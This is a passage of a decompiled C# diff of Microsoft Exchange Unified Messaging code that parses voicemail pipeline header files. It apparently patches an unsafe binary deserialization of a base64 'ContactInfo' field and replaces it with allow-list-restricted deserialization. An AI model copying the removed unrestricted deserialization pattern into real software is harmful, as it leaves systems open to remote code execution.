-\t\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"ProcessedCount\"))\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tnum = Convert.ToInt32(array[1], CultureInfo.InvariantCulture) + 1;\n +\t\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\t\telse if (text4 == \"RecipientObjectGuid\")\n +\t\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"RecipientObjectGuid\"))\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.RecipientObjectGuid = new Guid(array[1]);\n \t\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\telse if (text4 == \"CallerNAme\")\n +\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerNAme\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerName = array[1];\n \t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\telse if (num2 <= 507978139U)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tif (num2 != 152414519U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (num2 == 507978139U)\n +\t\t\t\t\t\t\t\t\t\tif (num2 != 507978139U)\n \t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tif (text4 == \"RecipientName\")\n -\t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.RecipientName = array[1];\n -\t\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"RecipientName\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tsubmissionHelper.RecipientName = array[1];\n +\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\telse if (text4 == \"ContactInfo\")\n +\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tcontactInfo = (CommonUtil.Base64Deserialize(array[1]) as ContactInfo);\n -\t\t\t\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"ContactInfo\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tException ex = null;\n +\t\t\t\t\t\t\t\t\t\ttry\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\ttry\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tusing (MemoryStream memoryStream = new MemoryStream(Convert.FromBase64String(array[1])))\n +\t\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\t\tcontactInfo = (ContactInfo)TypedBinaryFormatter.DeserializeObject(memoryStream, PipelineContext.contactInfoDeserializationAllowList, null, true);\n +\t\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcatch (ArgumentNullException ex)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcatch (SerializationException ex)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcatch (Exception ex)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tfinally\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tif (ex != null)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Failed to get contactInfo from header file {0} with Error={1}\", new object[]\n +\t\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\t\theaderFile,\n +\t\t\t\t\t\t\t\t\t\t\t\t\tex\n +\t\t\t\t\t\t\t\t\t\t\t\t});\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\telse if (num2 != 707084238U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (num2 == 872212143U)\n +\t\t\t\t\t\t\t\t\tif (num2 != 872212143U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (text4 == \"CallerId\")\n -\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerId = Microsoft.Exchange.UM.UMCommon.PhoneNumber.Parse(array[1]);\n -\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerId\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerId = Microsoft.Exchange.UM.UMCommon.PhoneNumber.Parse(array[1]);\n +\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\telse if (text4 == \"SentTime\")\n +\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"SentTime\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\tDateTime dateTime = Convert.ToDateTime(array[1], CultureInfo.InvariantCulture);\n \t\t\t\t\t\t\t\t\texDateTime = new ExDateTime(ExTimeZone.CurrentTimeZone, dateTime);\n \t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t\telse if (num2 <= 2593661420U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num2 <= 1526417836U)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tif (num2 != 978885386U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (num2 == 1526417836U)\n +\t\t\t\t\t\t\t\t\t\tif (num2 != 1526417836U)\n \t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tif (text4 == \"MessageType\")\n -\t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\ttext = array[1];\n -\t\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"MessageType\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\ttext = array[1];\n +\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\telse if (text4 == \"CallerAddress\")\n +\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerAddress\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerAddress = array[1];\n \t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\telse if (num2 != 1850847732U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (num2 == 2593661420U)\n +\t\t\t\t\t\t\t\t\tif (num2 != 2593661420U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (text4 == \"CallId\")\n -\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallId = array[1];\n -\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallId\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tsubmissionHelper.CallId = array[1];\n +\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\telse if (text4 == \"CallerIdDisplayName\")\n +\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerIdDisplayName\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\tsubmissionHelper.CallerIdDisplayName = array[1];\n \t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t\telse if (num2 <= 3342616108U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num2 != 2975106116U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (num2 == 3342616108U)\n +\t\t\t\t\t\t\t\t\tif (num2 != 3342616108U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (text4 == \"TenantGuid\")\n -\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.TenantGuid = new Guid(array[1]);\n -\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"TenantGuid\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tsubmissionHelper.TenantGuid = new Guid(array[1]);\n +\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\telse if (text4 == \"SenderAddress\")\n +\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"SenderAddress\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\tstring text5 = array[1];\n \t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t\telse if (num2 != 3581765001U)\n \t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\tif (num2 == 4186841001U)\n +\t\t\t\t\t\t\t\tif (num2 != 4186841001U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (text4 == \"CultureInfo\")\n -\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tsubmissionHelper.CultureInfo = array[1];\n -\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\tif (!(text4 == \"CultureInfo\"))\n +\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\tsubmissionHelper.CultureInfo = array[1];\n +\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\telse if (text4 == \"MessageID\")\n +\t\t\t\t\t\t\telse if (!(text4 == \"MessageID\"))\n \t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\ttext2 = array[1];\n -\t\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\ttext2 = array[1];\n +\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\tIL_409:\n \t\t\t\t\t\t\tsubmissionHelper.CustomHeaders[array[0]] = array[1];\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\tnum2 = <PrivateImplementationDetails>.ComputeStringHash(text);\n \t\t\t\tif (num2 <= 894870128U)\n \t\t\t\t{\n \t\t\t\t\tif (num2 <= 360985808U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 != 356120169U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (num2 == 360985808U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (text == \"Fax\")\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tpipelineContext = new FaxPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t\telse if (text == \"IncomingCallLog\")\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tpipelineContext = new IncomingCallLogPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (num2 != 438908515U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 != 466919760U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (num2 == 894870128U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (text == \"CDR\")\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tpipelineContext = CDRPipelineContext.Deserialize((string)submissionHelper.CustomHeaders[\"CDRData\"]);\n -\t\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t\telse if (text == \"MissedCall\")\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tpipelineContext = new MissedCallPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (text == \"OCSNotification\")\n \t\t\t\t\t{\n \t\t\t\t\t\tpipelineContext = OCSPipelineContext.Deserialize((string)submissionHelper.CustomHeaders[\"OCSNotificationData\"]);\n \t\t\t\t\t\ttext2 = pipelineContext.messageID;\n \t\t\t\t\t\texDateTime = pipelineContext.sentTime;\n -\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\telse if (num2 <= 1086454342U)\n \t\t\t\t{\n \t\t\t\t\tif (num2 != 995233564U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 == 1086454342U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (text == \"XSOVoiceMail\")\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tpipelineContext = new XSOVoiceMessagePipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (text == \"PartnerTranscriptionRequest\")\n \t\t\t\t\t{\n \t\t\t\t\t\tpipelineContext = new PartnerTranscriptionRequestPipelineContext(submissionHelper);\n -\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\telse if (num2 != 1356218075U)\n \t\t\t\t{\n \t\t\t\t\tif (num2 != 2525024257U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 == 3974407582U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (text == \"SMTPVoiceMail\")\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num < PipelineWorkItem.ProcessedCountMax - 1)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tpipelineContext = new VoiceMessagePipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\tpipelineContext = new MissedCallPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (text == \"HealthCheck\")\n \t\t\t\t\t{\n \t\t\t\t\t\tpipelineContext = new HealthCheckPipelineContext(Path.GetFileNameWithoutExtension(headerFile));\n -\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\telse if (text == \"OutgoingCallLog\")\n \t\t\t\t{\n \t\t\t\t\tpipelineContext = new OutgoingCallLogPipelineContext(submissionHelper);\n -\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\tgoto IL_694;\n \t\t\t\t}\n \t\t\t\tthrow new HeaderFileArgumentInvalidException(string.Format(CultureInfo.InvariantCulture, \"{0}: {1}\", \"MessageType\", text));\n -\t\t\t\tIL_62E:\n +\t\t\t\tIL_694:\n \t\t\t\tif (text2 == null)\n \t\t\t\t{\n \t\t\t\t\ttext2 = Guid.NewGuid().ToString();\n \t\t\t\t\texDateTime = ExDateTime.Now;\n \t\t\t\t}\n \t\t\t\tpipelineContext.HeaderFileName = headerFile;\n \t\t\t\tpipelineContext.processedCount = num;\n \t\t\t\tif (contactInfo != null)\n \t\t\t\t{\n \t\t\t\t\tIUMResolveCaller iumresolveCaller = pipelineContext as IUMResolveCaller;\n \t\t\t\t\tif (iumresolveCaller != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tiumresolveCaller.ContactInfo = contactInfo;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\tpipelineContext.sentTime = exDateTime;\n \t\t\t\tpipelineContext.messageID = text2;\n \t\t\t\tpipelineContext.WriteHeaderFile(headerFile);\n \t\t\t\tresult = pipelineContext;\n \t\t\t}\n -\t\t\tcatch (IOException ex)\n +\t\t\tcatch (IOException ex2)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Failed to parse the header file {0} because its not closed by thread creating the file. Error={1}\", new object[]\n \t\t\t\t{\n \t\t\t\t\theaderFile,\n -\t\t\t\t\tex\n +\t\t\t\t\tex2\n \t\t\t\t});\n \t\t\t\tif (pipelineContext != null)\n \t\t\t\t{\n \t\t\t\t\tpipelineContext.Dispose();\n \t\t\t\t\tpipelineContext = null;\n \t\t\t\t}\n \t\t\t\tresult = null;\n \t\t\t}\n -\t\t\tcatch (InvalidObjectGuidException ex2)\n +\t\t\tcatch (InvalidObjectGuidException ex3)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceWarning(ExTraceGlobals.VoiceMailTracer, 0, \"Couldn't find the recipient for this message. Error={0}\", new object[]\n \t\t\t\t{\n -\t\t\t\t\tex2\n +\t\t\t\t\tex3\n \t\t\t\t});\n \t\t\t\tif (pipelineContext != null)\n \t\t\t\t{\n \t\t\t\t\tpipelineContext.Dispose();\n \t\t\t\t\tpipelineContext = null;\n \t\t\t\t}\n \t\t\t\tthrow;\n \t\t\t}\n -\t\t\tcatch (InvalidTenantGuidException ex3)\n +\t\t\tcatch (InvalidTenantGuidException ex4)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceWarning(ExTraceGlobals.VoiceMailTracer, 0, \"Couldn't find the tenant for this message. Error={0}\", new object[]\n \t\t\t\t{\n -\t\t\t\t\tex3\n +\t\t\t\t\tex4\n \t\t\t\t});\n \t\t\t\tif (pipelineContext != null)\n \t\t\t\t{\n \t\t\t\t\tpipelineContext.Dispose();\n \t\t\t\t\tpipelineContext = null;\n \t\t\t\t}\n \t\t\t\tthrow;\n \t\t\t}\n -\t\t\tcatch (NonUniqueRecipientException ex4)\n +\t\t\tcatch (NonUniqueRecipientException ex5)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceWarning(ExTraceGlobals.VoiceMailTracer, 0, \"Multiple objects found for the recipient. Error={0}\", new object[]\n \t\t\t\t{\n -\t\t\t\t\tex4\n +\t\t\t\t\tex5\n \t\t\t\t});\n \t\t\t\tif (pipelineContext != null)\n \t\t\t\t{\n \t\t\t\t\tpipelineContext.Dispose();\n \t\t\t\t\tpipelineContext = null;\n \t\t\t\t}\n \t\t\t\tthrow;\n \t\t\t}\n \t\t\treturn result;\n \t\t}\n \n \t\tinternal abstract void WriteCustomHeaderFields(StreamWriter headerStream);\n \n \t\tpublic abstract string GetMailboxServerId();\n \n \t\tpublic abstract string GetRecipientIdForThrottling();\n \n \t\tinternal virtual void SaveMessage()\n \t\t{\n \t\t\tthis.WriteHeaderFile(this.HeaderFileName);\n \t\t}\n \n \t\tprotected override void InternalDispose(bool disposing)\n \t\t{\n \t\t\tif (disposing)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, this.GetHashCode(), \"PipelineContext.Dispose() called\", Array.Empty<object>());\n \t\t\t}\n \t\t}\n \n \t\tprotected override DisposeTracker InternalGetDisposeTracker()\n \t\t{\n \t\t\treturn DisposeTracker.Get<PipelineContext>(this);\n \t\t}\n \n \t\tprotected virtual void SetMessageProperties()\n \t\t{\n \t\t\tIUMResolveCaller iumresolveCaller = this as IUMResolveCaller;\n \t\t\tif (iumresolveCaller != null)\n \t\t\t{\n \t\t\t\tExAssert.RetailAssert(iumresolveCaller.ContactInfo != null, \"ResolveCallerStage should always set the ContactInfo.\");\n \t\t\t\tUMSubscriber umsubscriber = ((IUMCAMessage)this).CAMessageRecipient as UMSubscriber;\n \t\t\t\tUMDialPlan dialPlan = (umsubscriber != null) ? umsubscriber.DialPlan : null;\n \t\t\t\tMicrosoft.Exchange.UM.UMCommon.PhoneNumber pstnCallbackTelephoneNumber = this.CallerId.GetPstnCallbackTelephoneNumber(iumresolveCaller.ContactInfo, dialPlan);\n \t\t\t\tthis.messageToSubmit.From = iumresolveCaller.ContactInfo.CreateParticipant(pstnCallbackTelephoneNumber, this.CultureInfo);\n \t\t\t\tXsoUtil.SetVoiceMessageSenderProperties(this.messageToSubmit, iumresolveCaller.ContactInfo, dialPlan, this.CallerId);\n \t\t\t\tthis.messageToSubmit.InternetMessageId = BoomerangHelper.FormatInternetMessageId(this.MessageID, Utils.GetHostFqdn());\n \t\t\t\tthis.messageToSubmit[ItemSchema.SentTime] = this.SentTime;\n \t\t\t}\n \t\t\tthis.messageToSubmit.AutoResponseSuppress = AutoResponseSuppress.All;\n \t\t\tthis.messageToSubmit[MessageItemSchema.CallId] = this.helper.CallId;\n \t\t\tIUMCAMessage iumcamessage = this as IUMCAMessage;\n \t\t\tif (iumcamessage != null)\n \t\t\t{\n \t\t\t\tthis.MessageToSubmit.Recipients.Add(new Participant(iumcamessage.CAMessageRecipient.ADRecipient));\n \t\t\t\tIADSystemConfigurationLookup iadsystemConfigurationLookup = ADSystemConfigurationLookupFactory.CreateFromOrganizationId(iumcamessage.CAMessageRecipient.ADRecipient.OrganizationId);\n \t\t\t\tthis.MessageToSubmit.Sender = new Participant(iadsystemConfigurationLookup.GetMicrosoftExchangeRecipient());\n \t\t\t}\n \t\t}\n \n \t\tprotected void WriteHeaderFile(string headerFileName)\n \t\t{\n \t\t\tusing (FileStream fileStream = File.Open(headerFileName, FileMode.Create, FileAccess.Write, FileShare.None))\n \t\t\t{\n \t\t\t\tusing (StreamWriter streamWriter = new StreamWriter(fileStream))\n \t\t\t\t{\n \t\t\t\t\tif (this.MessageType != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tstreamWriter.WriteLine(\"MessageType : \" + this.MessageType);\n \t\t\t\t\t}\n \t\t\t\t\tstreamWriter.WriteLine(\"ProcessedCount : \" + this.processedCount.ToString(CultureInfo.InvariantCulture));\n \t\t\t\t\tif (this.messageID != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tstreamWriter.WriteLine(\"MessageID : \" + this.messageID);\n \t\t\t\t\t}\n \t\t\t\t\tif (this.sentTime.Year != 1)\n \t\t\t\t\t{\n \t\t\t\t\t\tstreamWriter.WriteLine(\"SentTime : \" + this.sentTime.ToString(CultureInfo.InvariantCulture));\n \t\t\t\t\t}\n \t\t\t\t\tthis.WriteCommonHeaderFields(streamWriter);\n \t\t\t\t\tthis.WriteCustomHeaderFields(streamWriter);\n \t\t\t\t}\n \t\t\t}\n \t\t}\n \n \t\tprotected virtual void WriteCommonHeaderFields(StreamWriter headerStream)\n \t\t{\n \t\t\tif (!this.CallerId.IsEmpty)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallerId : \" + this.CallerId.ToDial);\n \t\t\t}\n \t\t\tif (this.helper.RecipientName != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"RecipientName : \" + this.helper.RecipientName);\n \t\t\t}\n \t\t\tif (this.helper.RecipientObjectGuid != Guid.Empty)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"RecipientObjectGuid : \" + this.helper.RecipientObjectGuid.ToString());\n \t\t\t}\n \t\t\tif (this.helper.CallerName != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallerNAme : \" + this.helper.CallerName);\n \t\t\t}\n \t\t\tif (!string.IsNullOrEmpty(this.helper.CallerIdDisplayName))\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallerIdDisplayName : \" + this.helper.CallerIdDisplayName);\n \t\t\t}\n \t\t\tif (this.CallerAddress != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallerAddress : \" + this.CallerAddress);\n \t\t\t}\n \t\t\tif (this.helper.CultureInfo != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CultureInfo : \" + this.helper.CultureInfo);\n \t\t\t}\n \t\t\tif (this.helper.CallId != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallId : \" + this.helper.CallId);\n \t\t\t}\n \t\t\tIUMResolveCaller iumresolveCaller = this as IUMResolveCaller;\n \t\t\tif (iumresolveCaller != null && iumresolveCaller.ContactInfo != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"ContactInfo : \" + CommonUtil.Base64Serialize(iumresolveCaller.ContactInfo));\n \t\t\t}\n \t\t\theaderStream.WriteLine(\"TenantGuid : \" + this.helper.TenantGuid.ToString());\n \t\t}\n \n \t\tprotected UMRecipient CreateRecipientFromObjectGuid(Guid 